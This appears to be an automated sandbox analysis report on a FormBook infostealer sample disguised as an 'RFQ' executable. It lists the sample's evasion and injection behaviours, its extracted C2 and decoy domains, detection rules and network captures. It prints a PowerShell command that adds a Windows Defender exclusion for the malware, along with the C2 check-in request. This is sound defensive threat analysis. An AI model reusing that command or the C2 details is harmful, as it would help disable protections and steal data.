Windows Analysis Report
RFQ 245801.exe

Overview

General Information

Sample name: RFQ 245801.exe
Analysis ID: 1528045
MD5: 4be29153bc863fa6d2914aab9759e6aa
SHA1: eb30dab7d18b7bbf2673573cc96da82f6374d85b
SHA256: ffaa78a8a97885716e7dbe2a4a7ed9e1593ea5690f02f79f5d63c9b4964559da
Tags: exe, user-Maciej8910871

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RFQ 245801.exe (PID: 6716 cmdline: "C:\Users\user\Desktop\RFQ 245801.exe" MD5: 4BE29153BC863FA6D2914AAB9759E6AA)
    • powershell.exe (PID: 1508 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RFQ 245801.exe (PID: 916 cmdline: "C:\Users\user\Desktop\RFQ 245801.exe" MD5: 4BE29153BC863FA6D2914AAB9759E6AA)
    • RFQ 245801.exe (PID: 4280 cmdline: "C:\Users\user\Desktop\RFQ 245801.exe" MD5: 4BE29153BC863FA6D2914AAB9759E6AA)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • NETSTAT.EXE (PID: 7156 cmdline: "C:\Windows\SysWOW64\NETSTAT.EXE" MD5: 9DB170ED520A6DD57B5AC92EC537368A)
          • cmd.exe (PID: 7072 cmdline: /c del "C:\Users\user\Desktop\RFQ 245801.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}
Source | Rule | Description | Author | Strings
00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
5.2.RFQ 245801.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.RFQ 245801.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.RFQ 245801.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.2.RFQ 245801.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.RFQ 245801.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18819:$sqlite3step: 68 34 1C 7B E1
  • 0x1892c:$sqlite3step: 68 34 1C 7B E1
  • 0x18848:$sqlite3text: 68 38 2A 90 C5
  • 0x1896d:$sqlite3text: 68 38 2A 90 C5
  • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18983:$sqlite3blob: 68 53 D8 7F 8C

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 245801.exe", ParentImage: C:\Users\user\Desktop\RFQ 245801.exe, ParentProcessId: 6716, ParentProcessName: RFQ 245801.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", ProcessId: 1508, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 245801.exe", ParentImage: C:\Users\user\Desktop\RFQ 245801.exe, ParentProcessId: 6716, ParentProcessName: RFQ 245801.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", ProcessId: 1508, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ 245801.exe", ParentImage: C:\Users\user\Desktop\RFQ 245801.exe, ParentProcessId: 6716, ParentProcessName: RFQ 245801.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe", ProcessId: 1508, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-07T14:47:43.845330+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 188.114.96.3 | 80 | TCP
2024-10-07T14:48:45.319943+0200 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50012 | 185.26.122.70 | 80 | TCP

AV Detection

Source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.ridges-freezers-56090.bond/c24t/"], "decoy": ["ealthbridgeccs.online", "ngelicais.art", "uktuksu1.sbs", "fapoker.asia", "hecreature.tech", "orenzoplaybest14.xyz", "op-smartphones-deal.today", "delark.click", "7395.asia", "otnews.cfd", "j16e.xyz", "oko.events", "fscxb.top", "roudtxliberals.vote", "asas-br.bond", "ourhealthyourlife.shop", "fbpd.top", "j9u9.xyz", "uijiuw.top", "aming-chair-37588.bond", "uaweiharmony.top", "458881233.men", "ewancash.boats", "mss-rb2.net", "472.top", "yhomeshop.online", "j88.travel", "02s-pest-control-us-ze.fun", "oinl.club", "ouseware.today", "1385.net", "eviewmadu.top", "khizmetlergirisyapzzz2024.net", "dcnn.net", "aketrtpmvpslot88.info", "hoys.club", "ealerslot.net", "consuyt.xyz", "ilw.legal", "aithful.events", "est-life-insurance-2507.today", "rvinsadeli.dev", "sx9u.shop", "23fd595ig.autos", "yrhbt.shop", "commerce-74302.bond", "lc-driving-school.net", "7y1ps.shop", "earing-tests-69481.bond", "amilablackwell.online", "venir-bienne.info", "024tengxun396.buzz", "ocoani.shop", "arage-door-repair-1.today", "entista-esp.today", "vto.stream", "loud-computing-intl-3455364.fyi", "9790.club", "us-inbox-messages.online", "aser-hair-removal-90284.bond", "etangkhap99.lol", "leaningjobs-cz.today", "nline-courses-classes-lv-1.bond", "essislotgoal14.xyz"]}
Source: RFQ 245801.exe | ReversingLabs: Detection: 44%
Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.RFQ 245801.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.4143214191.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4142849705.0000000002B00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1749545031.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.4141170996.00000000026A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ 245801.exe | Joe Sandbox ML: detected
Source: RFQ 245801.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: RFQ 245801.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: netstat.pdbGCTL | source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: netstat.pdb | source: RFQ 245801.exe, 00000005.00000002.1799554359.0000000001287000.00000004.00000020.00020000.00000000.sdmp, RFQ 245801.exe, 00000005.00000002.1799523213.0000000001270000.00000040.10000000.00040000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000002.4141063988.0000000000640000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: RFQ 245801.exe, RFQ 245801.exe, 00000005.00000002.1799833129.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000007.00000003.1799562620.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.000000000323E000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000002.4143880964.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, NETSTAT.EXE, 00000007.00000003.1801214390.0000000002EF7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 4x nop then jmp 07339222h | 0_2_07339684
Source: C:\Users\user\Desktop\RFQ 245801.exe | Code function: 4x nop then jmp 07339222h | 0_2_0733989E

Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49743 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50012 -> 185.26.122.70:80
Source: C:\Windows\explorer.exe | Network Connect: 188.114.96.3 80
Source: Malware configuration extractor | URLs: www.ridges-freezers-56090.bond/c24t/
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE "C:\Windows\SysWOW64\NETSTAT.EXE"
Source: global traffic | HTTP traffic detected: GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1 | Host: www.j88.travel | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 6_2_0FBA8F82 getaddrinfo,setsockopt,recv, | 6_2_0FBA8F82
Source: global traffic | HTTP traffic detected: GET /c24t/?9rm4ULV=iDjdFcjw5QZJ8NeJJL4ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+m2NwmP2xDXw&D4hl2=fT-dvVK08nUDKdF HTTP/1.1 | Host: www.j88.travel | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | DNS traffic detected: DNS query: www.j88.travel
Source: global traffic | DNS traffic detected: DNS query: www.venir-bienne.info
Source: global traffic | DNS traffic detected: DNS query: www.ridges-freezers-56090.bond
Source: global traffic | DNS traffic detected: DNS query: www.oko.events
Source: global traffic | DNS traffic detected: DNS query: www.earing-tests-69481.bond
Source: global traffic | DNS traffic detected: DNS query: www.458881233.men
Source: global traffic | DNS traffic detected: DNS query: www.delark.click
Source: global traffic | DNS traffic detected: DNS query: www.ilw.legal
Source: global traffic | DNS traffic detected: DNS query: www.02s-pest-control-us-ze.fun
Source: global traffic | DNS traffic detected: DNS query: www.sx9u.shop
Source: global traffic | DNS traffic detected: DNS query: www.khizmetlergirisyapzzz2024.net
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: RFQ 245801.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: RFQ 245801.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: RFQ 245801.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 00000006.00000000.1743773191.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4157100696.0000000009837000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1739582157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3115023359.0000000009836000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000000.1739582157.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4151697507.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000006.00000000.1745616106.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000006.00000002.4157692270.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4155839185.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1741977210.0000000008720000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
Source: RFQ 245801.exe, 00000000.00000002.1746477242.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.02s-pest-control-us-ze.fun
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.02s-pest-control-us-ze.fun/c24t/www.sx9u.shop
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.02s-pest-control-us-ze.funReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.458881233.men
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.458881233.men/c24t/
